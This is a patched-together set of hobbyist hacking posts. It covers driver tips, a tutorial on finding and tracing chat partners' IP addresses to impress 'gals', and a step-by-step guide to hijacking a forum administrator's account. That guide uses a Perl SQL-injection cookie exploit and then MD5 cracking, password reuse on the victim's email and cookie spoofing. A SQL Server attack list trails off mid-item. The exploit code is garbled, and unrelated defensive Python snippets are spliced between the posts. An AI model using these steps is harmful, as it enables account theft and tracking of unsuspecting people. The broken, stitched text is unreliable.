Note: This is available only with XP Pro
:::::::::::::
Identify Faulty Device Drivers

If you are having problems with lockups, blue screens, or can only get to safe mode,
often the problem is due to a faulty device driver.

One way to help identify them is through the use of the Verifier program

Start / Run / Verifier
Keep the default of Create Standard Settings
Select the type of drivers you want to confirm
A list of drivers to be verified on the next boot will be shown.
Reboot
If your computer stops with a blue screen, you should get an error message with the problem driver
To turn off the Verifier, run verifier /reset
:::::::::::::
Viewing Installed Drivers

If you want to see a list of installed drivers, you can run the driverquery program
There are a lot of available switches to view different types of information.
One use can be to export to a CSV file for viewing in Excel
An example would then be:

Driverquery /v /fo csv > drivers.csv

Hope you Get this !!!

surely comment here m waiting for comments ....




In here I have figured out some very easy but cool ways to trace the geographical location and various other info, like ISP details, of a remote computer using its IP.

Well I guess its one of the most important must learn manual for boys out there if you want to impress your friends particularly gals whom you’ll meet online in a chat room and tell them their geographical locations and ISP details and make them surprised and impressed .

In the practical execution of this manual you don’t have to work much as it is very simple only you have to use your brain to understand some symbols and some format of expressions and use your IQ to execute things the right way.

What is IP and how to get the IP of a remote system::

Getting the IP (Internet Protocol) address of a remote system is the most important and the first step of hacking into it. Probably it is the first thing a hacker does to get info for researching a system. An IP is a unique number assigned to each computer on a network. It is this unique address which represents the system on the network. Generally the IP of a particular system changes each time you log on to the network by dialing to your ISP, and it is assigned to you by your ISP. The IP of a system which is always on the network generally remains the same. Generally those kinds of systems are most likely to suffer a hacking attack because of their stable IP. Using IP you can even execute system commands on the victim’s computer.

Let's take the example of the following IP address: 202.144.49.110. Now the first part, the numbers before the first decimal, i.e. 202, is the Network number or the Network Prefix. This means that it identifies the number of the network in which the host is. The second part, i.e. 144, is the Host Number, that is, it identifies the number of the host within the Network. This means that in the same Network, the network number is the same. In order to provide flexibility in the size of the Network, there are different classes of IP addresses:

Address Class              Dotted Decimal Notation Ranges
Class A ( /8 Prefixes)     1.xxx.xxx.xxx through 126.xxx.xxx.xxx
Class B ( /16 Prefixes)    128.0.xxx.xxx through 191.255.xxx.xxx
Class C ( /24 Prefixes)    192.0.0.xxx through 223.255.255.xxx

The various classes will be clearer after reading the next few lines.

Each Class A Network Address contains an 8-bit Network Prefix followed by a 24-bit host number. They are considered to be primitive. They are referred to as “/8’s” or just “8’s” as they have an 8-bit Network prefix.

In a Class B Network Address there is a 16-bit Network Prefix followed by a 16-bit Host number. It is referred to as “16’s”.

A Class C Network address contains a 24-bit Network Prefix and an 8-bit Host number. It is referred to as “24’s” and is commonly used by most ISP’s.

Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site. This is where sub-netting came in.

Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when sub-netting comes in then the IP Addresses structure becomes:

xxx.xxx.zzz.yyy

where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain the same and only the last part i.e. yyy is variable.

***********************

For Example, if say an ISP xyz is given the IP: 203.98.12.xx Network address then you can be awarded any IP, whose first three fields are 203.98.12. Get it?

So, basically this means that each ISP has a particular range in which to allocate all its subscribers. Or in other words, all subscribers or all people connected to the internet using the same ISP, will have to be in this range. This in effect would mean that all people using the same ISP are likely to have the same first three fields of their IP Addresses.

This means that if you have done a lot of (By this I really mean a lot) of research, then you could figure out which ISP a person is using by simply looking at his IP. The ISP name could then be used to figure out the city and the country of the person. Right? Let me take an example to stress as to how cumbersome but easy (once the research is done) the above method can be.

In my country, say there are three main ISP’s:

ISP Name    Network Address Allotted
ISP I       203.94.47.xx
ISP II      202.92.12.xx
ISP III     203.91.35.xx

Now, if I get to know the IP of an e-pal of mine, and it reads: 203.91.35.12, then I can pretty easily figure out that he uses ISP III to connect to the internet. Right? You might say that any idiot would be able to do this. Well, yes and no. You see, the above method of finding out the ISP of a person was successful only because we already had the ISP and Network Address Allotted list with us. So, what my point is, that the above method can be successful only after a lot of research and experimentation. And, I do think such research can be helpful sometimes.

Also, this would not work if you take it all on at a larger scale. What if the IP that you have belongs to someone living in a remote igloo in the North Pole? You could not possibly get the Network Addresses of all the ISP’s in the world, could you? If yes please send it to me :)

Well now I guess you have pretty good knowledge about what an IP is and what you can do by knowing the IP of a remote system. Now let's come to the point of finding out the IP of a remote system.

Well you can easily figure out the IP of a remote system using the netstat utility available in Microsoft’s version of DOS. The netstat command shows the connections in which your system is engaged and the ports they are using. Suppose you are checking your mail in hotmail and you want to find out the IP of msn. All you need to do is open a DOS window (command.com) and type netstat. You will see all the open connections of your system. There you will see something like:

Proto  Local Address  Foreign Address  State
TCP    abhisek:1031   64.4.xx.xx:80    ESTABLISHED

Now you have the IP address of hotmail as 64.4.xx.xx.

Similarly you can figure out the IP address of most http or ftp connections.

To know your own IP, type the following command in a DOS window:

C:\>netstat -n

[this command converts the IP names into IP addresses]

This is what you will probably see on typing the above command:

Proto  Local Address        Foreign Address     State
TCP    203.xx.251.161:1031  194.1.129.227:21    ESTABLISHED
TCP    203.xx.251.161:1043  207.138.41.181:80   FIN_WAIT_2
TCP    203.xx.251.161:1053  203.94.243.71:110   TIME_WAIT
TCP    203.xx.251.161:1058  194.1.129.227:20    TIME_WAIT
TCP    203.xx.251.161:1069  203.94.243.71:110   TIME_WAIT
TCP    203.xx.251.161:1071  194.98.93.244:80    ESTABLISHED
TCP    203.xx.251.161:1078  203.94.243.71:110   TIME_WAIT

Here 203.xx.251.161 is your IP address.

Now let's clarify the format used by netstat:

Proto: It shows the type of protocol the connection with the remote system is using.

Here TCP (Transmission Control Protocol) is the protocol used by my system to connect to other systems.

Local Address: It shows the local address, i.e. the local IP. When the netstat command is executed without the -n switch, the name of the local system is displayed, and when netstat is executed with the -n switch, the IP of the local system is displayed. Here you can also find out the port used by the connection.

xxx.yyy.zzz.aaa:1024

You will see the local address in this format. Here 1024 is the port to which the remote system is connected in your system.

Foreign Address: It shows the IP address of the remote system to which your system is connected. In this case also, if the netstat command is executed with the -n switch then you directly get the IP of the victim, but if netstat is executed without the -n switch then you will get the address of the remote system. Something like

C:\>netstat

Proto  Local Address  Foreign Address                State
TCP    abhisek:1031   msgr.lw4.gs681.hotmail.com:80  ESTABLISHED

Here msgr.lw4.gs681.hotmail.com is the address of the foreign system. Putting this address in any IP lookup program and doing a whois lookup will reveal the IP of the remote system.

Note: The port to which your system is connected can be found from this in the same way as I have shown in the case of the local address. The difference is that this is the port of the remote system to which your computer is connected.

Below I have produced a list of ports and popular services generally found to be running.

21 :: FTP port

80 :: http port

23 :: Telnet port

Note: If you execute the netstat command and find ports like 12345, 27374 are open and in use, then be sure that your sweetheart computer is infected with her boyfriend.. :) :) :) :) I mean your computer is infected with some sort of Trojan.

Below I have produced a list of commonly known Trojans and the ports they use by default. So if you find these ports open then get a good virus buster and get these stupid servers of the Trojans kicked out. Well if you want to play with these Trojans by keeping them in your computer but not letting them ruin your system performance, then just disable them from the system registry run key and they won't be loaded to memory each time Windows starts up [this trick doesn’t work for all Trojans].

Netbus :: 12345(TCP)

Subseven :: 27374(TCP)

Girl Friend :: 21554(TCP)

Back Orifice :: 31337 (UDP)
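
The check described in the note above can be automated. The following is an added example, not part of the original article: it parses `netstat -an` output and reports rows whose local port matches one of the four default ports listed above. The sample output and its addresses are constructed.

```python
import re

# Default ports from the list above: (protocol, local port) -> Trojan name.
TROJAN_PORTS = {
    ("TCP", 12345): "Netbus",
    ("TCP", 27374): "Subseven",
    ("TCP", 21554): "Girl Friend",
    ("UDP", 31337): "Back Orifice",
}

# Constructed sample of `netstat -an` output; the addresses come from the
# reserved documentation ranges, not from a real capture.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.0.2.10:1031        198.51.100.7:80        ESTABLISHED
  TCP    192.0.2.10:27374       203.0.113.50:4021      ESTABLISHED
  TCP    192.0.2.10:1044        198.51.100.9:12345     TIME_WAIT
  UDP    0.0.0.0:31337          *:*
  UDP    0.0.0.0:445            *:*
"""

# Proto, local endpoint, foreign endpoint, optional state (UDP rows have none).
ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$")


def split_endpoint(endpoint):
    """Split 'host:port' (also '[::]:135' or '*:*') into (host, port or None)."""
    host, _, port = endpoint.rpartition(":")
    return host, int(port) if port.isdigit() else None


def find_trojan_ports(netstat_text):
    """Return one finding per row whose LOCAL port is a listed Trojan default.

    Only the local side is checked: a listed port on the foreign side only
    means this machine talked to that port on some other host.
    """
    findings = []
    for line in netstat_text.splitlines():
        match = ROW.match(line)
        if not match:
            continue  # banner, column header or blank line
        proto, local, foreign, state = match.groups()
        _, local_port = split_endpoint(local)
        name = TROJAN_PORTS.get((proto, local_port))
        if name is None:
            continue
        findings.append({
            "trojan": name,
            "proto": proto,
            "local": local,
            "foreign": foreign,
            # LISTENING: the server part is waiting for a controller.
            # ESTABLISHED: a remote host is connected to it right now.
            "state": state or "(no state, UDP)",
        })
    return findings


if __name__ == "__main__":
    for f in find_trojan_ports(SAMPLE_NETSTAT):
        print(f"{f['trojan']:<13}{f['proto']} {f['local']:<22}{f['foreign']:<22}{f['state']}")
```

A match is only a lead: these are default ports that can be changed, so a clean result does not prove the machine is clean.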

Well guys and gals I hope you are now well familiar with the term IP, what the utility of IP is in the cyber world, and how to get the IP of a remote system to which you are connected. I hope you find my writings very easy to understand. I know I lack the capacity of explaining myself but I try my level best to make things very easy and clear for you all.

How to get the IP of a remote system while chatting through msn messenger ::

This is a tutorial on how to get IP address from MSN messenger. This is actually
a really easy thing to do. It is not like going through the hard time and reversing
MSN messenger like many people think.

The IP address is only given when you accept or are sending a file through MSN
messenger. When you send IM’s, the message is sent through the server, thus hiding
your victim's IP and yours. But when you send a file or receive a file, it is a direct
connection between the two computers.

To obtain the IP accept a file transfer or send a file to the victim, when the file
sending is under way from the dos prompt type “netstat” without the quotation marks.
You should get a table like this:

Proto Local Address Foreign Address State
TCP kick:1033 msgr-ns29.msgr.hotmail.com:1863 ESTABLISHED
TCP kick:1040 msgr-sb36.msgr.hotmail.com:1863 ESTABLISHED
TCP kick: ESTABLISHED

The top name in the list is the server’s address for IMing. There could be many of
the second name in the list, as a new connection is made to the server for every
room you are IMing to. You are looking for the address of the remote host in
this table; it may be something similar to “host63-7-102-226.ppp.cal.vsnl.com” or “203..64.90.6”
without the quotation marks.
All you need to do now is to put this address in your IP lookup program and get the IP of the remote system.

Well 50% of the work is done now. Now you know how to get the IP of a remote system, so it's time to trace it down and find some details about the IP.

Tracing an IP is quite simple. You can do it the easy way by using some sweet software like Visual Trace 6.0b

[ftp://ftp.visualware.com/pub/vr/vr.exe]

Neotrace

[http://www.neoworx.com/download/NTX325.exe]

or by our way, i.e. using MS DOS or any other version of DOS.

Well I suggest you use DOS and its tracert tool for tracing the IP, because using it will give you a clear conception of the art of tracing an IP, and I guarantee that you will feel much more satisfied on success than when using a silly piece of software. Further, you will know how things work, how the IP is traced down and the different networks associated with this tracing process.

Let us take a look at the tracert tool provided for DOS by Microsoft.

It is a very handy tool for people who need to trace down an IP.

Just open any DOS window and type tracert.

C:\windows>tracert

Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

Options:
-d                 Do not resolve addresses to hostnames.
-h maximum_hops    Maximum number of hops to search for target.
-j host-list       Loose source route along host-list.
-w timeout         Wait timeout milliseconds for each reply.

You will now see a description of the tracert command and the switches associated with it.

Well these switches don’t make much difference. All you can do is increase the timeout in milliseconds by using the -w switch if you are using a slow connection, and use the -d switch if you do not wish to resolve addresses to hostnames by default.

By default tracert performs a maximum of 30 hops trace. Using the -h switch you can specify the number of hops to perform.

Now it's time for execution.

Let us trace down the IP yahoo.com [216.115.108.243]

TIP: If you have done a long research (I mean a lot) then simply looking at the IP you can figure out some info from it. For example the IP 203.90.68.8 indicates that the system is in India. In India IPs generally begin with 203 and 202.

C:\WINDOWS>tracert yahoo.com

Tracing route to yahoo.com [216.115.108.243] over a maximum of 30 hops:

 1  308 ms  142 ms  127 ms  203.94.246.35
 2  140 ms  135 ms    *     203.94.246.1
 3  213 ms  134 ms  132 ms  203.94.255.33
 4  134 ms  130 ms  129 ms  203.200.64.29
 5  122 ms  135 ms  131 ms  203.200.87.75
 6  141 ms  137 ms  121 ms  203.200.87.15
 7  143 ms  170 ms  154 ms  vsb-delhi-stm1.Bbone.vsnl.net.in [202.54.2.241]
 8  565 ms  589 ms  568 ms  if-7-0.bb8.NewYork.Teleglobe.net [207.45.198.65]
 9  596 ms  584 ms  600 ms  if-3-0.core2.NewYork.teleglobe.net [207.45.221.66]
10    *       *       *     Request timed out.
11  703 ms  701 ms  719 ms  if-3-0.core2.PaloAlto.Teleglobe.net [64.86.83.205]
12  694 ms  683 ms  681 ms  if-6-1.core1.PaloAlto.Teleglobe.net [207.45.202.33]
13  656 ms  677 ms  700 ms  ix-5-0.core1.PaloAlto.Teleglobe.net [207.45.196.90]
14  667 ms  673 ms  673 ms  ge-1-3-0.msr1.pao.yahoo.com [216.115.100.150]
15  653 ms  673 ms  673 ms  vl20.bas1.snv.yahoo.com [216.115.100.225]
16  666 ms  676 ms  674 ms  yahoo.com [216.115.108.243]

Trace complete.

Note: Here I have traced yahoo.com. In place of yahoo.com you can give the IP of yahoo or any other IP you want to trace, the result will be the same.

Now, carefully looking at the results, you can figure out a lot of information about yahoo’s server [216.115.108.243]

First, packets of data leave my ISP, which is at 203.94.246.35. Similarly you can find out the different routers through which the packets of data are sent and received to and from the target system. Now take a look at the 13th line: you’ll see that the router is in PaloAlto.Teleglobe.net; from this you can easily figure out that the router is in Palo Alto. Now finally look at the target system, i.e. Yahoo’s server vl20.bas1.snv.yahoo.com. Now you have the address of yahoo’s server. Now put this address in any IP lookup program and perform a reverse DNS lookup, and you will get most of the info about this address, like the place where it is.

Well another thing you can find out using the tracert tool is the number of hops (routers) the target system is away from you. In the case of tracerouting yahoo.com we find that the target system, i.e. yahoo’s server, is 16 hops away from my system. This indicates that there are 16 routers between my system and yahoo’s server.

Apart from tracing an IP you can find out many useful details about the target system using the tracert tool.

Firewall Detection

While tracerouting a target system, if you get * as an output then it indicates a timeout error. Now if you perform another traceroute to the same target system at some other time with a good connection, and in this way a few times more, and if you always get * as the output, then take it for sure that the target system is running a firewall which prevents sending of data packets from the target system.

Example

Some days ago I tried to tracert hotmail’s server in a plain and simple way, using tracert without any trick. This is what I found out:

c:\windows>tracert 64.4.53.7

Tracing route to lc2.law5.hotmail.com [64.4.53.7]
over a maximum of 30 hops:

 1     *        *        *     Request timed out.
 2   161 ms   147 ms    85 ms  203.90.69.81
 3   126 ms   261 ms   219 ms  203.90.66.9
 4   121 ms   115 ms   228 ms  delswp2.hclinfinet.com [203.90.66.133]
 5   727 ms   725 ms   711 ms  203-195-147-250.now-india.net.in [203.195.147.250]
 6  1006 ms   794 ms   952 ms  core-fae-0-0.now-india.net.in [203.195.147.3]
 7   826 ms   731 ms   819 ms  213.232.106.9
 8   885 ms   744 ms   930 ms  213.166.3.209
 9   851 ms  1020 ms  1080 ms  213.232.64.54
10  1448 ms   765 ms  1114 ms  pos8-0.core2.London1.Level3.net [212.113.0.118]
11   748 ms   789 ms   750 ms  ge-4-2-1.mp2.London1.Level3.net [212.187.131.146]
12   719 ms   733 ms   846 ms  so-3-0-0.mp1.London2.Level3.net [212.187.128.46]
13   775 ms   890 ms   829 ms  so-1-0-0.mp2.Weehawken1.Level3.net [212.187.128.138]
14   853 ms   852 ms   823 ms  so-3-0-0.mp1.SanJose1.Level3.net [64.159.1.129]
15   889 ms   816 ms   803 ms  so-7-0-0.gar1.SanJose1.Level3.net [64.159.1.74]
16     *        *        *     Request timed out.
17     *        *        *     Request timed out.
18     *        *        *     Request timed out.
19     *        *        *     Request timed out.
20     *        *        *     Request timed out.
21     *        *        *     Request timed out.
22     *        *        *     Request timed out.
23     *        *        *     Request timed out.
24     *        *        *     Request timed out.
25     *        *        *     Request timed out.
26     *        *        *     Request timed out.
27     *        *        *     Request timed out.
28     *        *        *     Request timed out.
29     *        *        *     Request timed out.
30     *        *        *     Request timed out.

Trace complete.

I performed the same tracert many times a day but concluded with the same result. This indicates that the systems after the router SanJose1.Level3.net have firewalls installed which prevent the outgoing of data packets.

Detecting Traceroute Attempts on your System

You can detect that an attacker is performing a traceroute on your system, if you see the following symptoms:

1. If you observe port scans on very high UDP ports. This symptom means that the attacker has performed a traceroute on your system. However, it could also mean simply a port scan. Either way, it signifies the fact that your system is being scanned.

2. If the packet-monitoring tool installed in your network picks up several outgoing TTL-exceeded messages, then it is yet another sign that someone is doing a traceroute on your system.

3. If in these log files you also observe an outgoing ICMP port unreachable error message, then it means that a traceroute was done on your system and, as the target system (i.e. your system) was reached, it responded with this error message.

You can also find out more information on the attacker (if he performs a traceroute on your system) by simply studying the sniffer log files. If you observe the TTL values, then you can easily figure out the following information on the attacker by making use of OS detection techniques discussed earlier in this white paper:

The Operating System running on the attacker’s target system.
Number of hops away, the attacker is from you.
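
The three symptoms above can be combined into one check over a sniffer log. The following is an added example, not part of the original article: the packet records and addresses are constructed, and the port threshold 33434 (the conventional first destination port of UDP traceroute) and the minimum probe count are assumptions of this sketch.

```python
from collections import defaultdict, namedtuple

# Assumptions of this sketch, not values from the article:
TRACEROUTE_BASE_PORT = 33434  # conventional first destination port of UDP traceroute
MIN_PROBES = 3                # distinct high ports from one source before reporting

ICMP_TIME_EXCEEDED = 11           # symptom 2
ICMP_PORT_UNREACHABLE = (3, 3)    # symptom 3: type 3 (unreachable), code 3 (port)

Packet = namedtuple("Packet", "direction proto src sport dst dport icmp_type icmp_code")


def udp(direction, src, sport, dst, dport):
    return Packet(direction, "udp", src, sport, dst, dport, None, None)


def icmp(direction, src, dst, icmp_type, icmp_code):
    return Packet(direction, "icmp", src, None, dst, None, icmp_type, icmp_code)


ROUTER, HOST = "192.0.2.1", "192.0.2.10"   # our border router and the probed host
A, B, DNS = "198.51.100.7", "203.0.113.50", "198.51.100.53"

# Constructed sniffer summary (documentation addresses only).
SAMPLE_PACKETS = [
    # A: probes walk up the port range; the router answers the short-TTL ones,
    # then the host itself answers once a probe reaches it.
    udp("in", A, 45001, HOST, 33434), icmp("out", ROUTER, A, 11, 0),
    udp("in", A, 45001, HOST, 33435), icmp("out", ROUTER, A, 11, 0),
    udp("in", A, 45001, HOST, 33436), icmp("out", HOST, A, 3, 3),
    # B: unsolicited high UDP ports, no ICMP answers seen leaving the network.
    udp("in", B, 5000, HOST, 40000),
    udp("in", B, 5000, HOST, 40001),
    udp("in", B, 5000, HOST, 40002),
    # DNS: replies to queries we sent first land on high ports too; ignored.
    udp("out", HOST, 50000, DNS, 53), udp("in", DNS, 53, HOST, 50000),
    udp("out", HOST, 50001, DNS, 53), udp("in", DNS, 53, HOST, 50001),
    udp("out", HOST, 50002, DNS, 53), udp("in", DNS, 53, HOST, 50002),
]


def detect_traceroute(packets):
    """Group the three symptoms by remote source and return a verdict for each."""
    solicited = set()  # (remote host, our source port) for UDP that we sent first
    seen = defaultdict(lambda: {"ports": set(), "ttl_exceeded": 0, "port_unreachable": 0})
    for p in packets:
        if p.proto == "udp" and p.direction == "out":
            solicited.add((p.dst, p.sport))
        elif p.proto == "udp" and p.direction == "in":
            # Symptom 1: unsolicited UDP to very high ports.
            if p.dport >= TRACEROUTE_BASE_PORT and (p.src, p.dport) not in solicited:
                seen[p.src]["ports"].add(p.dport)
        elif p.proto == "icmp" and p.direction == "out":
            if p.icmp_type == ICMP_TIME_EXCEEDED:
                seen[p.dst]["ttl_exceeded"] += 1
            elif (p.icmp_type, p.icmp_code) == ICMP_PORT_UNREACHABLE:
                seen[p.dst]["port_unreachable"] += 1

    report = {}
    for src, s in seen.items():
        if len(s["ports"]) < MIN_PROBES:
            continue
        if s["ttl_exceeded"] and s["port_unreachable"]:
            verdict = "traceroute, target reached"
        elif s["ttl_exceeded"]:
            verdict = "traceroute, target not reached"
        else:
            # High ports alone (even with port-unreachable replies) also fit a scan.
            verdict = "port scan or traceroute"
        report[src] = {
            "verdict": verdict,
            "high_udp_ports": sorted(s["ports"]),
            "ttl_exceeded": s["ttl_exceeded"],
            "port_unreachable": s["port_unreachable"],
        }
    return report


if __name__ == "__main__":
    for src, info in detect_traceroute(SAMPLE_PACKETS).items():
        print(src, info)
```

The symptoms listed above describe UDP-based traceroute; a trace sent with ICMP echo requests never touches the high UDP ports and would need a separate rule.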

OKI DOKI Buddys that’s all for this article. Hope you will find this article very easy to understand and implement.
Surely Comment here Okzz!!

forums

This is what you like to call "Hacking a forum".
I call it "Cracking into a forum" ... Learn what hacking means you lazy f*cks, lol...
Note: How Hackers Hack into forum slowly, everything they do, is posted here by steps :
First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be referring to it as "hackingsite".

So you've got your target. You know the forum to want to hack, but how? Let's find the user we want to hack. Typically, you'd want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be "1". Find the User ID of the administrator, or person you wish to hack. For this tutorial, let's say his/her ID is "2".
Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of "hackingsite", which is User ID "2".
Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don't have it, here:

CODE

#!/usr/bin/perl -w
##################################################################
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com
##################################################################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";
exit;
}
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
my $outputs = '';
for( $i=1; $i < j="0;" current =" $charset[$j];" sql =" (" cookie =" ('Cookie'"> $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '';
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current\n";
last;
}
}
if ( length($outputs) < member_id=" . $user . " pass_hash="">

What the f*ck, pretty confused, aren't you? What the f*ck are you supposed to do with this shit?! I'll tell you. First of all, this is a Perl script. Copy and paste that code into Notepad.
How can you execute Perl scripts? Well, you can upload them to your CGI-BIN, or you can take my route of preference, and install Perl on your PC.
You're going to want to go and get ActivePerl. I am sure it's here somewhere in Appz.
Open the file up, and let it install. Leave everything on default. In other words, just keep hitting "OK".
So now you have Perl installed. Open up "My Computer", and then click on "Local Disk (C:/)". In there, you should see a folder named "Perl". Open up that folder, and within "Perl", you should see another folder named "bin". Open up "bin". Now that you're in, drag and drop "ipb.pl" from your desktop, into "bin".
Alrighty. Now everything is fine, and you're ready to Pwn some FAGS ...
What you're going to want to do now, is open up your command prompt. If you don't know how, please quit this site, and die.... Start - Run - CMD
Alright, so now you're in your command prompt. You want to change the directory in your command prompt to your Perl/bin directory. To do this, type the following into your command prompt, and hit enter:
cd C:\Perl\bin
Good job. You're very, very close to being finished. Now that you are in the Perl/bin directory, we need to access the ipb.pl file. How do we do this? Type the following command into your command prompt:
perl ipb.pl
So, this is what we need to do. Type the following command into your command prompt:
ipb.pl http://hackingsite.com/forum 2 1
Obviously replace "http://hackingsite.com/forum" with the URL to the forum you wish to hack.
Now, this may take a minute. The exploit is gathering information, and grabbing the hash. Numbers/letters will slowly appear down the screen. Don't be alarmed, and allow the program a few minutes. Once the hash grabbing is complete, it will return a full hash, as well as User ID.
Now you have the hash. In our case, the hash is: 4114d9d3061dd2a41d2c64f4d2bb1a7f
But what can we do with this hash? To you, it just looks like a scramble of numbers and letters. What this is, is an MD5 hash. This is the person's password, encrypted using the MD5 algorithm. I urge you to do a quick read-up on MD5 hashes before continuing reading.
Done? You understand the very basics of MD5s? Good. You're probably thinking: I just read that MD5 hashes cannot be cracked!
LOL.. Indeed, MD5s are impossible to reverse. Once a string is MD5ed, there is no way to get it back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash.
There are many places online where you can enter hashes to be cracked. Personally, I use "Cain & Abel", which is a great MD5 cracker available at 'http://odix.it'.
You can use any method, and any crackers to crack this hash. 90% of the hashes I get, I am able to crack. Once you crack the hash, you will be given a plain-text password.
CONGRATS! You now have the victim's password! You can now login to his/her account on whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or MSN/AIM account.
But what if the hash is not crackable? You are merely left with a password hash. What can you do with this?
Well, you can spoof your cookie!
If you would like to learn more on spoofing cookies, use the friendly searching site they call "GOOGLE"
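An added example, not part of the original post: it contrasts the unsalted MD5 storage described above with salted PBKDF2 storage, and shows how existing MD5 rows can be wrapped without knowing the passwords. The record layout, function names, sample password and iteration count are assumptions made for this example.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumed work factor for this example; tune for your hardware


def legacy_md5(password: str) -> str:
    """Unsalted MD5 as in the post: equal passwords always give equal digests."""
    return hashlib.md5(password.encode()).hexdigest()


def slow_hash(secret: bytes, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", secret, salt, ITERATIONS)


def new_record(password: str) -> dict:
    """Store a password under a random per-user salt and a slow KDF."""
    salt = os.urandom(16)
    return {"scheme": "pbkdf2", "salt": salt, "hash": slow_hash(password.encode(), salt)}


def wrap_legacy(md5_hex: str) -> dict:
    """Harden an existing MD5 row at rest, without knowing the password."""
    salt = os.urandom(16)
    return {"scheme": "pbkdf2-md5", "salt": salt, "hash": slow_hash(md5_hex.encode(), salt)}


def verify(password: str, record: dict) -> bool:
    secret = password.encode()
    if record["scheme"] == "pbkdf2-md5":  # wrapped legacy row: MD5 first, then the KDF
        secret = legacy_md5(password).encode()
    # constant-time comparison of the recomputed and stored values
    return hmac.compare_digest(slow_hash(secret, record["salt"]), record["hash"])


def demo() -> dict:
    pw = "constructed-sample-password"  # constructed sample value
    first, second = new_record(pw), new_record(pw)
    wrapped = wrap_legacy(legacy_md5(pw))
    return {
        "md5_repeats": legacy_md5(pw) == legacy_md5(pw),   # lookup tables work
        "salted_repeats": first["hash"] == second["hash"],  # they do not here
        "verify_ok": verify(pw, first) and verify(pw, wrapped),
        "verify_bad": verify("wrong", wrapped),
    }
```

Because every record has its own salt and each guess costs 600,000 HMAC rounds, a leaked table can no longer be checked against precomputed MD5 lists.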


Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry out the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.
1. Direct connections via the Internet
These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.
2. Vulnerability scanning
Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.
Figure 1: Common SQL injection vulnerabilities found using WebInspect.
3. Enumerating the SQL Server Resolution Service
Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews' SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren't listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.
4. Cracking SA passwords
Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.
5. Direct-exploit attacks
Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.

Figure 2: SQL Server vulnerability exploitable using Metasploit's MSFConsole.
6. SQL injection
